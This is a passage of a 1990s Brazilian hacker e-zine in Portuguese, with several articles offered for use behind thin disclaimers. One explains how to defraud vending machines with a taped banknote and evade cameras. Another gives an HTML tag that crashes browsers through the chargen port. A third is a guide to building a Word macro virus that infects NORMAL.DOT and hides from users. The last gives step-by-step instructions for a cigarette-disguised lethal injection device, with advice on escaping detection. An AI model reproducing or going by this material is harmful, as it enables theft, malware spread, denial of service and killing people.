ne aqui no Brasil. Ok? Bele..
Olha so' o detalhe, se voce usar essa dica em maquinas que
cobram R$1,00, voce nao ganha nenhum centavo, so' a bebida. Mas se usar nas de
R$0,75, voce ainda ganha R$0,25 de troco, mas como voce nao gastou nada, voce
so vai ganhando grana. Quanto mais bebidas voce pegar, mais grana!!!
Antes de voce fazer isso, deixa eu limpar minha barra, eu nao fui pego
fazendo isso, e isso nao funciona em todas as cold drink machines(falo cold
drink por que tem de coca, de cerveja, de suco, etc...). Mas se voce for muito
mane' e for pego, nao vem falar de mim. Entao, leia isso como se fosse somente
para fins informativos, nao para fazer grana ou pegar bebidas gratis! Assim,
eu nao posso parar voce de pegar esse zine e ler isso so pra me proteger,
entao voce que fara' tudo, sem meu auxilio em nada ok??
Agora que eu ja limpei minha barra, como pegar bebidas gratis.
Mas eu falo novamente... isso nao funciona em todas as maquinas, somente em
algumas. As melhores para se fazer isso sao do primeiro modelo, aquele que tem
o buraco pra se colocar as moedas se nao quiser usar cedula.
.----------------------.
| Preparando a cedula `----------------------------------------.
`=================-=-====--==-=-=-===----==---=-=---=-=--- -- - -
-> Pegue uma nota novinha de um real (sem nenhum pedaco rasgado, sem estar
amassada ou riscada, novinha mesmo). Com a nota nova isso com certeza
funcionara'.
-> Pegue uma daquelas fitas que sao usadas para lacrar isopor de frios em
aeroportos, aquelas fitas transparentes. Nao confunda com isolante, por
que sao diferentes. Nao sei o nome correto mas creio que voce ja saiba
de qual estou falando. Se usar a fita isolante nao funcionara por que
ela e' muito fraca.
-> Agora coloque a nota em uma mesa como se voce fosse a colocar na
maquina.
_____________________________________
||-----------------------------------|####################
<- direcao da || Banco bla bla dbdb, 1 |####################
<- nota || o,o db |####################
<- na maquina || - d |### Fita Adesiva ###
<- de bebidas || . '. |####################
|| ###|REAIS\ (o) |####################
||___________________________________|####################
-------------------------------------
Isso ai', tudo fica assim na mesa. Agora coloque a fita na seguinte
posicao sobre a nota e fixe com outra parte da fita por baixo:
_____________________________________
||--------------------#########################################################
<- direcao da || banco bla bla ################### Fita Adesiva #########################
<- nota || ################### Exatamente #########################
<- na maquina || ################### no meio #########################
<- de bebidas || ################### da nota #########################
|| ###|REAIS\ #########################################################
||____________________#########################################################
------------------------------------- { 60 a 75 cms }
Tenha certeza de que voce deixou de 60 a 75 cms de fita depois da nota.
.------------------.
| Fazendo Funcionar `--------------------------------------------.
`=================-=-====--==-=-=-===----==---=-=---=-=--- -- - -
Eu fiz isso com uma nota de um real, mas se voce quiser usar de valor
maior, problema seu, quem se fode e' voce. Agora coloque a nota, mas segure na
ponta da fita. Algumas maquinas sao muito fortes e se voce segurar no meio da
fita a maquina pode rasgar sua nota. Agora que a maquina ja engoliu a nota
toda, comece a puxar a nota pra fora. Mas faca isso quando a maquina ja tiver
engolido a nota mas nao terminado o processo, senao voce danca. Puxe a nota
nao muito rapidamente, mas tambem nao muito lentamente. Faca em uma forca
uniforme. Voce deve ouvir um *CLAP*, o que significa que voce fez tudo ok. Se
voce nao ouvir e' porque voce fez tudo errado animal! Mas se voce ouviu o
*CLAP*, escolha uma bebida, e caso a maquina de troco, pegue o troco.
ATENCAO
Muitas das maquinas de bebidas sao vigiadas por cameras escondidas.
Observe bem o lugar onde voce vai agir para nao dar erro nenhum. Tambem nao
escolha um lugar com muito volume de gente passando por perto. A melhor hora
de agir e' entre as 2:00am e as 4:00am. Se voce pegar muita bebida e nao
souber o que fazer, venda a um preco bem baixo. Mas nao venda onde voce as
pegou.
So' isso... []'z
Cacaio Cacaio@DeathKnights.com
`'`'`' `'`'`'`'`'`'`'`'`'`'`'`
-=[ 11 ]=-
.------------------------.
| HTML DoS (simples d+) \__________________________________________________
`----------------------------------------------------------------------------'
by Cacaio
Muitos sistemas rodam um servico chamado 'chargen' na porta 19. Ele
simplesmente gera uma serie de caracteres interminaveis.
Se um usuario do Internerd Exploder ou do Lynx se conectar ao chargen
tentando ver um arquivo, abrir uma url ou sei la', simplesmente se conectar,
o browser pensara' que esta vendo um arquivo de tamanho infinito. Isso faz a
linha telefonica cair se o usuario estiver usando o IE, e deixa o linux muito
mais lento se voce tentar se conectar, por falta de memoria.
Uma url como http://localhost:19 poderia causar os danos a um sistema
que esta rodando o lynx. Mas se voce killar o chargen, nao tem problema, pois
os caracteres sao gerados em altissima velocidade, e quando voce killar, os
caracteres ja foram enviados a muito tempo.
O servico chargen serve, na verdade, para outros usos na seguranca de
sistemas, e pode ser desligado em sistemas normais.
Aqui vai um simplissimo codigo HTML que funciona para fazer o DoS no
Internerd Exploder.
<IMG src="maquina.com.chargen.ligado:19" alt="" height=1 width=1 align=left>
Onde 'maquina.com.chargen.ligado' e' qualquer maquina na rede que rode o
chargen. Se voce nao quiser que usuarios de IE visitem sua pagina, e voce
ainda quer se divertir com ele, insira este simples codigo. No lynx aparece
somente um '[INLINE]', e nao causa nenhum tipo de problemas.
Simples mas divertido.
Cacaio Cacaio@DeathKnights.com
`'`'`' `'`'`'`'`'`'`'`'`'`'`'`
-=[ 12 ]=-
.-------------------.
| VIRUS DE MACRO \_______________________________________________________
`----------------------------------------------------------------------------'
by Milly
Ola pessoal, desculpe a furada no zine passado, acontece que eu tive uns
problemas com minha conexao e acabei ficando sem nem mesmo acessar e-
mail; mas ja estamos de volta. Agora eu tenho uma materia especialmente
para voces; ja esta caindo em desuso devido ao avanco dos anti-virus mas
ainda pode ser util dada a teoria que tem por tras disso tudo, nesse zine
veremos algo sobre: VIRUS DE MACRO. Isso e muito bom para novatos, uma
vez que e extremamente facil de implementar e traz resultados
extremamente rapidos o que incentiva muito o aprofundamento desse
assunto.
Basicamente irei abordar como elaborar um virus para macro do Word 6.0 e
7.0, talvez eu traga um update para a versao 8.0 quando tiver mais
chances de estuda-la. A diferenca entre a versao 6.0 e 7.0 e o nome de
algumas funcoes e comandos, esse e o mesmo problema encontrado no caso de
linguagens diferentes do Word (Espanhol, Ingles, Portugues...).
Ainda nao tive tempo de avaliar totalmente a linguagem de macro do Word
8.0, mas sei que nao se trata de WordBasic, mas sim de VBA; isso
significa que todos os programas do Office 97 estao habilitados a
executar a mesma macro, ou seja em breve teremos virus de Excel, Access,
PowerPoint... Porem foram inseridas umas funcoes que evitam a
proliferacao de virus, mas isso nao e coisa para se preocupara pois como
sabemos se e microsoft deve haver um jeito de infectar.
.--------------------.
| TEORIA BASICA `------------------------------------------.
`=================-=-====--==-=-=-===----==---=-=---=-=--- -- - -
Existem algumas condicoes basicas para que possamos elaborar um virus:
1. Deve ser possivel executar funcoes e/ou procedimentos sem o
conhecimento nem autorizacao expressa do usuario.
2. Deve haver um hospedeiro atraves do qual o virus se propagara de uma
maquina a outra (afinal, ninguem vai te fazer o favor de copiar o virus
pra outra maquina por voce).
3. O virus deve se manter ativo sem o conhecimento do usuario, ate mesmo
dos pouco mais avancados.
.------------------------.
| RESOLVENDO OS PROBLEMAS `--------------------------------------.
`=================-=-====--==-=-=-===----==---=-=---=-=--- -- - -
1. Quem conhece virus diz logo de cara: "O Word foi feito para que se
possa implementar virus de macro.". E incrfvel a facilidade com que se
obtem recursos extremamente uteis para a elaboracao de virus no
WordBasic.
As funcoes basicas do Word podem ser modificadas para atender as
necessidade dos usuarios, Portanto se voce criar uma funcao com o mesmo
nome de uma funcao ja existente, nesse caso voce na verdade editar essa
funcao (experimente ArquivoAbrir, por exemplo).
2. E como eu digo: "Se eh Microsoft, eh possevel infectar!", o Word tem um
tipo de documento que pode carregar os codigos de WordBasic de uma
maquina para outra, sao os chamados Modelos. E precisa explicar qual a
melhor maneira de se transportar uma coisa entre um Word e Outro? E
atraves de arquivos. Basta apenas modificarmos os Documentos para se
tornarem Modelos. Alem disso existe uma funcao chamada CopiarMacro, com
essa macro nem e necessario abrir o arquivo para infecta-lo.
3. Existem varias maneira de se evitar que o usuario te perceba dentro do
Word, uma delas e essencial: Seu virus nao pode gerar nenhuma caixa de
dialogo ou mensagem de erro (o que ja encontrei em diversos virus por
ai).
Outra coisa muito boa e evitar que o usuario chame de alguma forma a
caixa de dialogo que mostram as macros definidas, no inicio os virus
simplesmente eliminavam o item do menu, eu pessoalmente acho isso pouco
aconselhavel pois um usuario um pouco mais experiente vai notar a
diferenca no menu. No MPad (virus que eu mesma fiz) eu redefini a funcao
FerramMacros de forma que a funcao nao chamava a caixa de dialogo, isso
resolve dois problemas: Se o usuario for experiente ele pode notar
rapidamente a modificacao no menu (o que nao ocorre); se o alguem vier
.------------------.
| INFECTANDO O WORD `--------------------------------------------.
`=================-=-====--==-=-=-===----==---=-=---=-=--- -- - -
Todo o Word tem um diretorio onde ele armazena os Modelos e la dentro
sempre existem um Modelo chamado NORMAL.DOT. Esse Modelo sempre e
carregado no inicio do Word, portanto e extremamente importante
contaminar esse arquivo, e como contaminar os arquivos de inicializacao
do sistema operacional.
O Modelo NORMAL.DOT pode ser referenciado na funcao MacroCopiar atraves
do identificador 'Global', assim voce deve incluir na funcao AutoOpen,
que se executa toda a vez que um documento e aberto uma sequencia de
comandos que copie suas macros para dentro do 'Global'.
.--------------------.
| INFECTANDO ARQUIVOS `------------------------------------------.
`=================-=-====--==-=-=-===----==---=-=---=-=--- -- - -
A tecnica que voce vai utilizar para infectar os arquivos vai do seu
estilo. Uns gostam de ser mais violentos outros sao mais discretos mas a
dica e utilizar o maior numero de funcoes que manipulam nomes de arquivos
que voce descobrir.
Outra dica e utilizar a funcao ArquivoNovoPadrao para infectar os
arquivos novos que o word cria, assim se o cara te tirar do NORMAL.DOT vc
ainda continua no documento ativo, mesmo que tenham acabado de iniciar o
Word.
.--------------------.
| CONFLITO DE VERSOES `------------------------------------------.
`=================-=-====--==-=-=-===----==---=-=---=-=--- -- - -
Um dos problemas de praticamente qualquer virus e o conflito de versoes,
deve-se tomar cuidado na elaboracao do primeiro virus para que ele nao
venha a infectar versoes posteriores do seu virus. Para isso eu fiz uma
funcao cujo nome seguia um padrao: MPadxx. Onde xx e o numero da versao,
assim eu pego o nome da funcao divido em duas partes e verifico qual eh a
versao, dessa forma versoes mais velhas ficam sao sobre-escritas pelas
mais novas.
.----------------------------.
| FEITICO CONTRA O FEITICEIRO `----------------------------------.
`=================-=-====--==-=-=-===----==---=-=---=-=--- -- - -
Outro Problema a ser resolvido e evitar de cair na sua propria armadilha.
O virus quanto mais bem feito mais dificil de se livar dele, e isso
inclui voce proprio e todo mundo envolvido no projeto. Porem um bom
projeto preve esse caso, eu resolvi esse problema criando uma macro cujo
nome eu nao vou revelar aqui (voce achou que eu iria entregar o ouro...)
que evita que o virus se copie dentro do teu NORMAL.DOT. Para todos os
efeitos sempre mantenha em mao um backup do NORMAL.DOT, mas nunca utilize
o mesmo nome, sempre procure utilizar ate mesmo outra extensoes.
E isso ai pessoal. Um virus de macro prontinho pra ser usado, so espero
que voces facam um bom uso dele, principalmente no que diz respeito a
essa nova galera que vem vindo ai pra detonar.
Ate a proxima tdk! ;)
Milly MillyPad@hotmail.com
`'`'` `'`'`'`'`'`'`'`'`'`'
-=[ 14 ]=-
.--------------------.
| A arte de matar \______________________________________________________
`----------------------------------------------------------------------------'
by Cacaio
Aqui voce vai aprender a matar. Nao me responsabilizo se voce tentar
fazer o que esta descrito aqui, pois com certeza resultara' em morte. Esta
materia e' a que mais pode causar danos de todas as materias ja publicadas
em todos os numeros de qualquer zine brasileiro, e dificilmente havera'
outra similar. Portanto, tenha certeza do que voce vai fazer. Se fizer
o que esta descrito aqui e der rolo pra voce, nao olhe pra mim. Eu nao quero
que voce faca o que ensinarei, e' apenas para fins educativos, tais como
mostrar que com materiais caseiros se pode causar danos muito serios e
irreversiveis. Este texto nao pode ser encontrado em nenhum outro local na
rede ou em qualquer livro ou publicacao, e' totalmente inedito. Tanto este
texto quanto toda esta zine *NAO* pode ser publicada sem autorizacao.
O que ensinarei voce a fazer e' a criar uma injecao letal, que
fica camuflada como um cigarro e e' indolor.
.----------------------.
| Materiais necessarios `---------------------------------------.
`=================-=-====--==-=-=-===----==---=-=---=-=--- -- - -
Toxico mortal como por exemplo, ar, cianidio, ou qualquer outro tambem serve
Seringa grande caso penetracao na pele seja necessaria
Seringa com 5cm ou menos com 2,5cm de agulha.
Seringa a qual cabe perfeitamente dentro de um cigarro vazio.
Cola forte
Cigarros grandes
.---------------------.
| Preparando a seringa `----------------------------------------.
`=================-=-====--==-=-=-===----==---=-=---=-=--- -- - -
1- Separe as duas partes da seringa que voce ira usar para fazer o servico.
2- Quebre a agulha na seringa maior. Agora coloque cola na base das seringas
menores. Coloque a agulha da seringa maior por cima da agulha da seringa
menor.
3- Corte as 'abas' da seringa.
4- Agora pegue a parte que voce empurra na seringa e corte o topo, e tambem
o corpo para que fique somente uma peca com 4.5cm no total.
5- O que voce deve ter agora e uma daquela parte que voce empurra na seringa
que seja apenas uma com 4.5cm no total(voce ja fez isto), e uma agulha
que tem mais ou menos 3cm. O conjunto total deve ser de 3 pecas que todas
montadas dao no total no maximo 10cm para caber dentro do cigarro.
.---------------------.
| Preparando o cigarro `-----------------------------------------.
`=================-=-====--==-=-=-===----==---=-=---=-=--- -- - -
1- Remova o filtro do cigarro girando ele, e jogue o papel fora. O papel que
sobra deve ter 1.2cm mais ou menos, o papel que fica junto da parte do
filtro. Tente nao danificar.
2- Agora tire o filtro com uma pinca de dentro do papel.
3- Agora pegue outro cigarro, jogue o fumo fora, tire o filtro e guarde
o papel.
4- O que voce deve ter agora e' um conjunto completo para montar um cigarro,
mas o conjunto todo vazio.
5- Cole o papel do cigarro na parte do filtro e deixe secar.
.----------------------.
| Preparando o conjunto `----------------------------------------.
`=================-=-====--==-=-=-===----==---=-=---=-=--- -- - -
1- Coloque o toxico dentro do corpo da seringa, ja com a agulha.
2- Deixe a parte que voce impurra puxada.
3- Coloque a seringa dentro do cigarro com a parte que voce impurra encostada
no filtro.
4- Preencha o espaco restante do cigarro com fumo.
.----------.
| Como Usar `---------------------------------------------------.
`=================-=-====--==-=-=-===----==---=-=---=-=--- -- - -
1- Acenda o cigarro. Nao havera problemas, pois a agulha estara' a uma
distancia que dara para o cigarro queimar mais ou menos 1 minuto sem
problema algum.
2- Ande por perto da vitima e o queime/injete nele empurrando a parte acesa
do cigarro armado contra ele. Como a parte que empurra o liquido esta do
lado do filtro, nao havera problema para voce.
3- A vitima pensara que foi apenas uma queimadura de cigarro, te xingar e
continuar andando. Em pouco tempo morrera'.
.--------------.
| Notas `-----------------------------------------------.
`=================-=-====--==-=-=-===----==---=-=---=-=--- -- - -
1- Voce tem que tentar fazer isto varias vezes, ate que o tamanho das
seringas seja o exato. Nao e' facil acertar.
2- Nao use muito liquido, ou a vitima percebera' que algo de errado esta
acontecendo antes de morrer.
3- Nunca jogue fora o material perto de onde voce atacou a vitima.
4- Destroia o material totalmente antes de jogar fora, e jogue no lixo
organico para que ninguem perceba nada.
5- Tome muito cuidado para nao te pegarem.
6- A queimadura cuidara' da dor, entao ele/ela nao sentira a picada da
agulha.
7- A pessoa morrera' entre 20 e 30 minutos, nao mais do que isto.
8- Se voce nao tiver toxico algum, nao coloque nada na seringa.
.------------------.
| Toxicos para usar `-------------------------------------------.
`=================-=-====--==-=-=-===----==---=-=---=-=--- -- - -
1- O toxico mais simples para se usar e' o ar. Uma bolha de ar no cerebro
pode causar a morte e *nao* existe nenhum meio de saber como foi a morte
em autopsias ou qualquer exame, a nao ser que percebam a queimadura
junto ao buraco da seringa.
2- Se vira e inventa algo! Desinfetante, qualquer coisa!
Cacaio Cacaio@DeathKnights.com
`'`'`' `'`'`'`'`'`'`'`'`'`'`'`
-=[ 14 ]=-
.-----------.
| FEW WORDS \_______________________________________________________________
`----------------------------------------------------------------------------'
by Cacaio
Quer saber quem sao os membros do TDK? De uma olhada em nossa page!
http://www.DeathKnights.com
Se voce quiser se tornar um membro do TDK, esqueca, ja temos muitos
membros.
Voce usa Linux e nao tem ICQ? Acha o ICQJava muito lento? Entao
visite http://www.deathknights.com/micq. Um cliente ICQ muito bom
que pode ser executado na shell mesmo. A partir do dia 15/09 estara',
no endereco citado acima, a versao em ingles. Aos poucos
disponibilizaremos as versoes em Portugues(BR) e Espanhol. O e-mail
do criador do micq e' mds1281@rit.edu. As traducoes serao feitas com
a autorizacao do mesmo.
Se voce quiser mandar um e-mail dizendo o que achou do zine, dar su-
gestoes, reclamar, elogiar, meter o pau, colocar alguma materia, este-
ja a vontade.
Se voce tem um zine BOM *OU* um programa e queira disponibiliza-lo
para os outros, mande-nos um e-mail. Voce podera' hospeda-lo em
http://www.deathknights.com/SuaEscolha gratuitamente. Hey, nao vem
pensando que isso aqui e' GeoCities, Xoom ou Tripod nao, antes iremos
avaliar seu pedido.
AVISO NOVAMENTE:
O TDK (The Death Knights) nao visa nenhum fim lucrativo. Qualquer uso
das informacoes contidas aqui nao e de nossa responsabilidade. Se voce
fizer algo descrito e se der mal, problema seu. Nos ensinamos, mas nao
pedimos para usarem o conhecimento adquirido com este zine.
Ate o proximo TDK!
___________________________________TDK______________________________________
----------------------------------------------------------------------------
Criticas? Sugestoes?
tdk@DeathKnights.com